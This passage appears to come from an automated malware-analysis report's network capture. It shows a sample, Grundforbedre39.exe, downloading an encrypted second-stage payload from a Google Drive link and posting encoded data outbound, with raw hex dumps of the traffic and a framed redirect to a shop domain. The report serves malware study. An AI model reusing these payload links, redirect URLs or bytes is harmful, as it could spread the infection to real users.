                                                                                    Data Ascii: 4stTOBwzqsmZtwH8m4nY6ynojnyyoI4E/gN5/KsN8ACWHB33yC/wwWxOVPk6izBXgi4McwqIIBUEPO9ANEqtYZkLlWShz4YLckkvKjN7FysrqPGqNxDUODeHHhLQauHZjVlZHLwj/w2ZITLmM7CclDk8aqrd/MJcCUAsB4vUF6Gc/8gmQHCRPnohSak//hGFF8TCbM4PcN71XCoxltFBMEHBF6RxKzvzr3DKSyHrWMiNUoEp5PP
                                                                                    Mar 18, 2024 14:55:29.842356920 CET5144OUTData Raw: 57 67 34 4e 31 59 57 58 30 6d 67 50 44 34 72 61 4a 5a 69 44 39 48 62 48 67 42 65 67 4e 62 52 6d 35 41 50 76 5a 73 57 48 50 33 4c 59 54 71 66 61 6a 72 34 32 4e 36 34 42 39 57 36 59 49 52 30 46 67 39 78 2b 61 38 70 70 2f 59 6b 56 77 78 59 33 4f 50
                                                                                    Data Ascii: Wg4N1YWX0mgPD4raJZiD9HbHgBegNbRm5APvZsWHP3LYTqfajr42N64B9W6YIR0Fg9x+a8pp/YkVwxY3OPIP0SNqYXtljHYV9zdi1UO07EhWUBKpB5iwNq7scRj4oj3bsz4RLV7x4Xo3W5ZYoXfqORRytteCrjJgYi8rJZUEGz6S3ff11NGIDj/N/lVCP5gfXEDI4UM+4ISZiSSELwjCBS3vA6w67LhrKNhoH0FaL+Ppb98UgUT
                                                                                    Mar 18, 2024 14:55:30.022346020 CET2572OUTData Raw: 59 6c 77 38 6f 64 58 30 65 4f 74 36 39 57 53 39 4c 41 35 73 6d 7a 6f 4c 7a 42 37 4a 63 6b 62 45 62 58 64 6c 30 56 72 74 33 32 56 4d 31 30 7a 35 72 51 39 77 47 65 69 4b 32 61 51 69 58 56 59 76 66 2f 72 36 5a 47 77 75 67 2f 41 38 56 4a 66 31 47 2f
                                                                                    Data Ascii: Ylw8odX0eOt69WS9LA5smzoLzB7JckbEbXdl0Vrt32VM10z5rQ9wGeiK2aQiXVYvf/r6ZGwug/A8VJf1G/3cob96ynyhOJwXwG+rpfE7GXFm4FSZnFO3mS/ieBrl6j7VMA9OdaGfXdbtsvgol7E2BhImPovtPyn8+ZShsVtBR/NjMj3yvyiAw/eccqFSMFPmV9cjnQu81JJj4CLwKpXMmGKVLUriSLePc5auisO99DDavZoguEN
                                                                                    Mar 18, 2024 14:55:30.022516012 CET7716OUTData Raw: 56 41 4b 59 6e 66 6e 6a 4f 43 4c 36 4c 36 6d 75 4d 59 6a 41 61 59 62 7a 67 51 66 76 32 32 57 33 76 35 53 30 49 49 51 4b 73 2f 6e 55 56 31 68 52 56 71 41 54 6c 68 57 79 64 79 39 5a 41 48 39 6c 4b 6e 72 48 68 79 71 69 6c 63 36 4e 78 49 70 45 33 58
                                                                                    Data Ascii: VAKYnfnjOCL6L6muMYjAaYbzgQfv22W3v5S0IIQKs/nUV1hRVqATlhWydy9ZAH9lKnrHhyqilc6NxIpE3XAIf30ak8tvYIoH/j54aZnlgkS+6IxHWvrGQdbOWS9Lc0kABBJJPr58xP7BFcbskL8BFG07QBzlmD74ng38pEXzFigHxyzR50hCL8RtLx/rxmCK+QuH7lP3dcXvDau4w7TFVob1jj4zGfmRWuunoYknIfOYf84fgA9
                                                                                    Mar 18, 2024 14:55:30.022701979 CET15432OUTData Raw: 38 5a 78 68 53 38 62 56 42 6e 4a 44 6f 4a 31 30 49 42 79 4a 50 4e 45 36 62 57 74 4f 4d 6b 46 57 42 4f 37 41 68 4d 2b 58 48 46 44 6b 4b 69 39 70 35 30 32 55 6e 7a 4d 66 75 69 67 62 45 6d 64 4d 6d 4c 32 59 42 41 6a 6b 55 2f 4b 47 70 4f 66 41 32 4a
                                                                                    Data Ascii: 8ZxhS8bVBnJDoJ10IByJPNE6bWtOMkFWBO7AhM+XHFDkKi9p502UnzMfuigbEmdMmL2YBAjkU/KGpOfA2JwJn0BQICuFujuKJIBpFcKd5MMf1rOlh0D+/V53ZHo1hGz2Bpe6Pk2CDLF2bDUTPSpik+RuhczoKMFrhalRwOB+UqOWNoFuoZVBwkA9URF5RLMuEcL0kKiFzcoSFoMwzTBHju16HQH4zDC7T+q/pFvJqZS+cs2DVOp
                                                                                    Mar 18, 2024 14:55:30.203087091 CET1286OUTData Raw: 30 41 50 4f 4c 69 2f 48 66 69 6e 6e 59 39 74 46 57 50 34 50 68 6d 32 33 76 53 35 67 77 72 34 57 5a 7a 58 64 43 69 42 73 74 37 71 73 59 73 68 68 75 6d 43 6c 44 43 77 34 32 6e 6d 57 37 35 36 35 4c 6a 38 77 6b 2b 41 41 57 31 68 4f 68 57 35 38 71 48
                                                                                    Data Ascii: 0APOLi/HfinnY9tFWP4Phm23vS5gwr4WZzXdCiBst7qsYshhumClDCw42nmW7565Lj8wk+AAW1hOhW58qHq4nXcn2LJpgoJj9sNCvlnNK9RiaqjX25A31Q3kd1QhlhGkfm9oNJBHoZWlK3PmiqyRnvLnoQ8X6tW2xHOfwMAfgr43KRZLeZNvjfuqHqgnhsaerYHCIBYGGl7ioVvKdmCoenf7md/7wMZloGdD7GsWUCJGwDHVaNs
                                                                                    Mar 18, 2024 14:55:30.203282118 CET13667OUTData Raw: 50 4e 5a 6a 6f 48 48 68 37 33 7a 31 79 41 41 51 51 37 37 78 39 69 32 2b 58 49 65 51 72 4f 70 4e 2b 67 75 38 43 45 44 76 5a 76 33 44 36 52 56 30 51 35 55 79 45 71 64 72 33 58 41 70 51 65 70 6c 39 48 2b 54 6f 6f 71 78 4c 70 77 4c 50 30 79 70 4e 47
                                                                                    Data Ascii: PNZjoHHh73z1yAAQQ77x9i2+XIeQrOpN+gu8CEDvZv3D6RV0Q5UyEqdr3XApQepl9H+TooqxLpwLP0ypNGIgKkg9c/t+oNyH64RyX+FSxukmI2MZhXXiWeRHYYWXzQ7mVE4eTQMs95I4xK6QluT/0NHbNMoqR8KYPgcuMFECqwH39vXNGngvhYNDqxeqgTRUlhvFXfLZFyw4WmYH0Z+40RozR8bgs31Etm+SCqexKZKEFBMOTvw
                                                                                    Mar 18, 2024 14:55:30.383697987 CET805INHTTP/1.1 200 OK
                                                                                    Cache-Control: max-age:600, public
                                                                                    Content-Length: 454
                                                                                    Expires: Mon, 18 Mar 2024 14:05:29 GMT
                                                                                    Last-Modified: Mon, 18 Mar 2024 13:55:29 GMT
                                                                                    Date: Mon, 18 Mar 2024 13:55:30 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    X-Onecom-Cluster-Name:
                                                                                    X-Varnish: 55985080460
                                                                                    Age: 0
                                                                                    Via: 1.1 webcache2 (Varnish/trunk)
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 22 77 77 77 2e 6d 61 6e 75 70 61 69 6e 74 2e 63 6f 6d 22 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 30 3b 0a 09 70 61 64 64 69 6e 67 3a 30 3b 0a 7d 0a 69 66 72 61 6d 65 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 09 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 09 77 69 64 74 68 3a 20 31 30 30 76 77 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 69 66 72 61 6d 65 20 73 72 63 3d 20 22 68 74 74 70 73 3a 2f 2f 70 69 6e 74 75 72 61 2e 6d 79 70 72 65 73 74 61 2e 73 68 6f 70 2f 6d 39 73 6f 2f 22 3e 3c 70 3e 59 6f 75 72 20 75 73 65 72 20 61 67 65 6e 74 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 73 2e 20 48 6f 77 65 76 65 72 20 79 6f 75 20 6d 61 79 20 76 69 73 69 74 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 6e 74 75 72 61 2e 6d 79 70 72 65 73 74 61 2e 73 68 6f 70 2f 6d 39 73 6f 2f 22 3e 74 68 65 20 70 61 67 65 20 74 68 61 74 20 77 61 73 20 73 75 70 70 6f 73 65 64 20 74 6f 20 62 65 20 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE html><html><head><title>"www.manupaint.com"</title><style type="text/css">body {margin:0;padding:0;}iframe {display: block;border: none;height: 100vh;width: 100vw;}</style></head><body><iframe src= "https://pintura.mypresta.shop/m9so/"><p>Your user agent does not support iframes. However you may visit <a href="https://pintura.mypresta.shop/m9so/">the page that was supposed to be here</a></p></iframe></body></html>


                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.11.2049757142.251.41.144439636C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-03-18 13:47:26 UTC216OUTGET /uc?export=download&id=1Sej1a4Ej4CGXO3nSBc1G7q0rnimapqk0 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                    Host: drive.google.com
                                                                                    Cache-Control: no-cache
                                                                                    2024-03-18 13:47:26 UTC1582INHTTP/1.1 303 See Other
                                                                                    Content-Type: application/binary
                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                    Date: Mon, 18 Mar 2024 13:47:26 GMT
                                                                                    Location: https://drive.usercontent.google.com/download?id=1Sej1a4Ej4CGXO3nSBc1G7q0rnimapqk0&export=download
                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                    Content-Security-Policy: script-src 'nonce-qP1l3IehTbOcaOTzzNMwaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                    Server: ESF
                                                                                    Content-Length: 0
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.11.2049758142.250.65.1614439636C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-03-18 13:47:26 UTC258OUTGET /download?id=1Sej1a4Ej4CGXO3nSBc1G7q0rnimapqk0&export=download HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                    Cache-Control: no-cache
                                                                                    Host: drive.usercontent.google.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-03-18 13:47:27 UTC4695INHTTP/1.1 200 OK
                                                                                    X-GUploader-UploadID: ABPtcPoLFfaLqtJsZqpWXvsJW0dAm4ssqYZ0sveflEV2ysA-hvgCOtrWkGGpvqz-sHf48q67FwpFYXKuaw
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Security-Policy: sandbox
                                                                                    Content-Security-Policy: default-src 'none'
                                                                                    Content-Security-Policy: frame-ancestors 'none'
                                                                                    X-Content-Security-Policy: sandbox
                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                    Cross-Origin-Resource-Policy: same-site
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Content-Disposition: attachment; filename="AsxSvHLPIWUyqjS57.bin"
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Credentials: false
                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
                                                                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 275008
                                                                                    Last-Modified: Tue, 12 Mar 2024 11:01:13 GMT
                                                                                    Date: Mon, 18 Mar 2024 13:47:27 GMT
                                                                                    Expires: Mon, 18 Mar 2024 13:47:27 GMT
                                                                                    Cache-Control: private, max-age=0
                                                                                    X-Goog-Hash: crc32c=tte7TA==
                                                                                    Server: UploadServer
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                    Connection: close
                                                                                    2024-03-18 13:47:27 UTC4695INData Raw: cd 42 9b 57 82 bd 28 b7 96 43 05 75 5b 98 aa 46 45 07 e6 d6 55 fa fd 04 1d dc f4 60 9f 16 1f 6c 37 f9 bc 73 47 fb 10 95 73 78 3e e7 1a ca 90 64 73 90 ad 05 5b 9e ac c7 21 4e 7e 94 c0 c3 77 4f 89 1a 26 3a d2 8f 03 d9 93 87 f5 d0 86 6a 86 38 6e ac 28 26 09 81 90 d4 c8 4c ae 6c f0 0c a8 3b bd d9 f8 1e 17 69 e5 04 b3 61 f7 ac 5e 90 48 df 31 87 cf b7 65 ad 26 f8 5c 30 1f d3 5b a6 0b b0 de 24 6c 2b e5 1c a8 97 3a 85 cf 96 ac 22 15 27 c9 b1 01 90 eb 6d 6e a3 14 4d 42 b2 8e 69 bb ca c0 37 70 6d d3 93 c9 16 f6 ed 3e ba 4b a0 55 89 45 ae bd 47 ce 67 0c fd a7 24 42 cd d6 9d 76 e4 fc f6 de 07 5e 1b fa c8 47 0c 33 31 bf c3 1f b1 e4 22 57 a2 09 3c 8a 44 5f 9b 55 5f 85 42 a4 79 bc 12 6e 2d b8 47 1e 54 3e da 5c b0 35 e6 bc 1b 62 4b 75 e0 ec 25 5d 18 b9 ea f8 1c 4a 8f 4f
                                                                                    Data Ascii: BW(Cu[FEU`l7sGsx>ds[!N~wO&:j8n(&Ll;ia^H1e&\0[$l+:"'mnMBi7pm>KUEGg$Bv^G31"W<D_U_Byn-GT>\5bKu%]JO
                                                                                    2024-03-18 13:47:27 UTC4695INData Raw: 7b 64 59 12 37 1a c5 66 65 f8 fe 93 a0 a5 cf 1c bb 4c 70 40 a3 47 3b af 6e f7 69 73 4e a2 92 05 e1 ec 80 30 fb 81 06 fd 5d 98 a5 bf 5a 0a 7c 0d dc c4 a2 7c b4 47 3e 76 42 51 f9 17 9d 2c e1 3e b8 d5 3a 72 04 d8 d7 04 47 b8 43 f1 8b 88 fa ca f7 b6 0a 4d f2 ac 60 db d7 17 ee 5f d9 09 cc b5 ab 05 68 9e 09 9a e0 ac c4 66 26 67 8d 94 28 72 7e b4 35 b7 cd a4 ec a2 49 3f a1 79 c9 fc ec 52 9f 90 6d 1f 71 10 11 48 bd c2 0a f4 72 33 73 f6 b9 1b 69 af e5 be 1b 48 fc 33 bd 0c bb a9 55 39 f5 30 5e aa 90 aa e5 d0 18 71 4a 09 a1 6d 6d 2b e4 42 a5 d1 8e 93 80 a4 2d ee d1 53 da 95 18 33 e0 99 bd 2c 98 69 d5 7f 86 82 c0 8b d3 a5 af e0 d1 2a c9 6f 7e 59 bb 0a 8e 45 0f ea d2 f6 89 c4 77 1d 28 2f b9 57 e1 38 5c b4 57 ad 3a 9d d8 00 d0 21 2d c0 3d d4 bb fd ed 90 a9 e2 db e0 e5
                                                                                    Data Ascii: {dY7feLp@G;nisN0]Z||G>vBQ,>:rGCM`_hf&g(r~5I?yRmqHr3siH3U90^qJmm+B-S3,i*o~YEw(/W8\W:!-=
                                                                                    2024-03-18 13:47:27 UTC1936INData Raw: 0e 50 3c 4a 41 b1 78 67 04 c9 ad 60 da 55 5e 1f c8 91 b3 aa b1 f8 ae 99 27 41 b6 b4 fb 07 4e 80 a3 11 f2 8b ca d2 d3 87 66 15 b9 17 17 36 b4 8a 14 6c fc 6e e6 80 d6 c7 b2 c1 92 6b f7 da e4 92 d4 0f cc f1 53 b6 18 58 be e0 02 b0 a3 dd 0f 9e 36 c4 fd 41 03 d4 c0 d8 35 32 22 02 b1 54 09 0c b8 56 75 ea 72 1b 74 ca 8f 9d f9 0e 15 49 92 52 9f 32 f1 1e 6e 82 af f0 4d 69 3d 7e 2c 91 ad 0e d6 68 5f fc 1d ef 4c fd 98 7f cc 76 6b e7 31 59 f8 88 9a 48 f4 1d 93 57 e6 57 35 c6 e0 50 37 2d d8 13 27 b9 41 89 59 e4 4c 0e fc 42 61 0f 41 ba 59 85 30 1c cb 28 d5 fd 37 f3 a9 b2 fa b8 80 8d 78 40 51 c1 da c4 49 38 95 e3 21 28 9f 80 e8 5c 3b 58 f1 ca 33 66 37 20 eb fe 18 19 b8 4e 95 a6 cd a3 23 c4 a6 52 e4 73 85 69 2f a9 25 2f 06 16 bc 7b 9b 1b 3f 9a 7a e6 a0 81 10 01 5f 3b c6
                                                                                    Data Ascii: P<JAxg`U^'ANf6lnkSX6A52"TVurtIR2nMi=~,h_Lvk1YHWW5P7-'AYLBaAY0(7x@QI8!(\;X3f7 N#Rsi/%/{?z_;
                                                                                    2024-03-18 13:47:27 UTC1252INData Raw: a3 e9 aa 7c 5e 9f 8d fc 43 04 c9 ed e2 e8 78 89 21 86 e6 73 5f 9d 70 bf ad 81 ba ee 62 aa b0 63 f8 59 cb d9 af d2 77 95 db d6 77 4c 37 a3 3a 1c 00 1f 3e 52 45 2f 28 b5 dd 2c f3 9f 7a 08 52 76 ef 29 82 18 02 04 16 d3 ad 75 eb 8f cf 9a 54 19 92 31 8a d8 3f f2 2f 9c 6e c8 68 28 8a 74 92 46 42 ce f0 c9 b7 35 a5 c8 9b 27 3a a3 f1 04 8a fe 6f 60 08 21 b5 6d 56 03 05 cc 96 5b 3e 9d f7 66 23 3b eb 76 3a 35 a0 7c 5b ec f4 38 f7 9c 7f 9a f1 68 22 71 e6 7b f1 18 e0 40 8f 0b 12 bb af b7 08 ad c7 4d b1 17 d0 82 ba 4b 43 36 b4 60 8e cc 5e b1 24 ae 34 93 cc f4 4e 0b 83 e7 82 a6 3d 59 db 9f 5c a6 bc b8 23 a4 04 0f 16 83 e4 c6 27 a8 ab 4c 8c 8c 82 77 d9 64 80 2e a8 00 19 1c ae 10 99 13 39 23 f0 66 5b 7a 8e 8f 5e 7f f8 5b bf 2e 9c d3 38 b5 f4 d6 6c 2c 88 14 03 d3 06 f9 8b
                                                                                    Data Ascii: |^Cx!s_pbcYwwL7:>RE/(,zRv)uT1?/nh(tFB5':o`!mV[>f#;v:5|[8h"q{@MKC6`^$4N=Y\#'Lwd.9#f[z^[.8l,
                                                                                    2024-03-18 13:47:27 UTC1252INData Raw: 18 e9 1d 05 fb 99 05 2b a7 76 1a 2f bb 55 00 a1 14 dd ce 3f 52 12 d3 17 0c 22 4b c7 a5 ad 19 93 31 32 8d be 0d 5a 13 1b 4b bb 9a b3 c1 18 c4 73 f9 2f 38 4b 40 2f 3f cd d8 1b 7b d6 16 8f fe ec 27 c0 90 f5 b8 23 31 d1 df 31 5d 53 30 ba 22 ad 1a f8 b5 2e ef 6a ec 11 d7 d6 b2 3d 5d 16 fc f7 ea d4 52 93 de d9 da f5 9e 38 4b 69 2b 40 9e 65 1e 12 33 79 7f 9b 5f e6 fc f1 55 ea 44 8e 36 33 8d 2c ae f9 b2 8c a4 b1 43 62 b6 6a c8 c6 ea e6 55 ed 5f 59 64 2b 6d 29 c7 8f 5e 58 e6 06 76 e2 61 ef de 89 86 90 47 4d 5a 35 86 30 71 ae 50 ff 90 bd 2d 1c d7 ed 00 e7 3a 9d 85 fc d0 2d 10 01 c0 6a 9f 4a 67 63 a6 e2 69 72 9b c5 35 fd 39 24 ed 5d cb 1b 58 46 9d c4 22 55 33 c2 3e a3 b9 2b 5a 99 9f 0f 0b c0 30 16 1d da e4 29 86 b7 8b 86 bb b7 b6 d3 82 80 38 20 40 a1 e1 88 73 7d 79
                                                                                    Data Ascii: +v/U?R"K12ZKs/8K@/?{'#11]S0".j=]R8Ki+@e3y_UD63,CbjU_Yd+m)^XvaGMZ50qP-:-jJgcir59$]XF"U3>+Z0)8 @s}y
                                                                                    2024-03-18 13:47:27 UTC1252INData Raw: 2d 57 8e 6b 58 7e dd 25 ae 2c 48 5f c3 a0 d8 0f 73 8f a7 61 e7 68 df 86 78 2c 8e 64 a7 d9 2b 20 8c 20 d3 d6 d1 fd 5f d7 f6 8d 3a 42 f0 f2 94 f8 53 3e 06 4a 69 d0 27 cf a3 32 1c 03 53 3e ab 2f f1 54 ba a8 6c ab be 69 0c 31 a1 be 88 5f 19 86 ac 91 c4 09 fd 30 1e 07 79 d2 56 38 35 a9 90 d7 25 a9 bd ba 1d ba 24 88 26 9c 56 f3 21 b3 f3 c6 81 20 37 d5 eb 96 8c 44 d6 59 ab 9f 78 84 e9 04 ae b3 f7 fe 1c 8b d0 53 4a 86 40 e8 fa 98 b4 91 01 21 b3 f2 89 f1 c6 79 1f fd 48 d0 56 b9 8f 39 ec f2 56 86 4e 16 e2 83 d0 0c 88 09 14 1e a8 38 10 b4 e3 3e db b9 47 ee 49 5f 22 4b 6d b1 95 2e 27 42 e9 ae 09 71 97 3c 01 3f cb 05 2c 9f 2b c6 1a 8d fe a5 7f dc de ea 25 b2 61 a3 e5 c3 51 ea 6d 06 17 51 d0 c4 a2 79 83 11 d8 8f 92 05 67 64 3c 4f 7c 88 37 12 f9 05 51 b0 e0 a6 c9 b8 68
                                                                                    Data Ascii: -WkX~%,H_sahx,d+ _:BS>Ji'2S>/Tli1_0yV85%$&V! 7DYxSJ@!yHV9VN8>GI_"Km.'Bq<?,+%aQmQygd<O|7Qh
                                                                                    2024-03-18 13:47:27 UTC1252INData Raw: af 5c c1 e8 2e d4 fb 05 7d b0 9d db bf 39 1a a1 b8 be d7 78 c1 bb c6 99 4e b5 97 88 cc 80 65 f6 7c c4 d7 bb 0d 73 52 a0 46 9f 7c 3e 4f 21 32 d5 00 eb 3e 00 6a 6e 95 b4 c5 eb de 89 b6 85 68 2d df 6f b6 7f 4d 1f b9 4b c9 e4 c9 69 17 7c 81 cd d3 28 d7 29 bc 59 bc fd 10 07 81 c2 40 cb 2b 16 1c 8f 8c 5c c6 63 31 13 d8 ee 03 e9 51 5e 82 42 e4 2b 29 37 d8 0c 13 95 4e af 4b d7 11 a3 6d 07 fb 14 93 cb 1f df 4f 9f 35 0c 38 a3 28 9c 26 9a d0 37 42 41 fe 38 09 1f 0d e4 91 91 b8 b5 74 9e 0b 83 ba 65 5d 92 e2 61 cc cd df ef 5b e2 58 18 26 c8 e3 90 79 de 9c 2a 5f 96 74 ae 2c 90 48 4c 49 31 04 3c d7 0c 38 b5 75 c2 43 36 85 85 31 d7 33 33 cf ca 45 21 30 76 3f 95 38 19 bf dd a9 2d 6f 59 8a 86 d1 84 6a cb 89 94 53 2f bc 7a ae ff 30 ef 68 e7 2a f0 c7 43 0a cd 28 ee d3 a1 a8
                                                                                    Data Ascii: \.}9xNe|sRF|>O!2>jnh-oMKi|()Y@+\c1Q^B+)7NKmO58(&7BA8te]a[X&y*_t,HLI1<8uC6133E!0v?8-oYjS/z0h*C(
                                                                                    2024-03-18 13:47:27 UTC1252INData Raw: ba 67 f6 d6 ca 8a 0f e2 2e bb 58 6e 81 27 4c 2e 8a 87 a3 c3 3b 20 9f cc f4 34 cb 20 0f 3b 16 65 6e 99 ea 33 cb 6a 5d 1b 57 1c 54 b8 20 e0 b5 5a 04 60 36 b6 c1 b7 5e 46 c8 0c 7e cf 86 5d c2 75 8a d9 8b af 06 6c 0d 5a 21 fc e6 78 10 c3 a9 32 4e 7e 61 ee b8 08 c9 74 50 81 c8 97 52 73 fe 54 da 87 4e a4 d3 69 2e 83 a9 01 55 ea f5 cf 06 b3 0b fd c4 01 4f d3 ed 29 39 fc 99 39 66 28 02 d9 48 12 ff 8e 3a 18 22 ab 81 1a 16 cc f7 8e 27 31 80 ce a7 dc c0 40 15 a6 fb 88 b9 e7 44 7b 8b d6 ee 4e fd df 43 f8 1a 22 dc 48 66 11 9c e0 9a fa de 25 a9 1f ab 97 12 15 80 89 80 f0 1c d3 7b 06 ab 8d 99 7b f9 92 67 4e 10 50 5a 5f ac 60 aa 7e df dd 65 e7 9e cd 84 4b 79 4c b1 c4 15 2d f1 6d a1 d0 ff 8a 9f ba 84 21 62 2d 21 39 90 6f 42 65 be bd ae 67 ef bc e1 13 14 32 ec e1 37 18 e7
